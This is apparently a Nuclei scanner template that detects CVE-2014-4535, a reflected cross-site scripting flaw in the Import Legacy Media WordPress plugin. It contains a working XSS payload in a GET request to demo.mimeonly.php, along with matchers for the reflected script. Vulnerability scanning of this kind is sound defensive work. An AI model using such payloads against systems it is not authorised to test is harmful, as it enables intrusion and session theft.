nuclei-templates/http/cves/2014/CVE-2014-4535.yaml

51 lines
2.1 KiB
YAML

id: CVE-2014-4535
info:
name: Import Legacy Media <= 0.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
impact: |
Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
remediation: |
Update to the latest version of the Import Legacy Media plugin (0.1 or higher) to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
- http://codevigilant.com/disclosure/wp-plugin-import-legacy-media-a3-cross-site-scripting-xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4535
cwe-id: CWE-79
epss-score: 0.00135
epss-percentile: 0.48439
cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: import_legacy_media_project
product: import_legacy_media
framework: wordpress
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth,import_legacy_media_project
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'></script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100b748ec3f080c43508a6e4b86ccae498e26c3614f2f06acc017d568fb99cdfb8402206569d13cb86a37da3dfa4744e75680fe26e2dd70d3391c8bf1488d20bd54022d:922c64590222798bb761d5b6d8e72950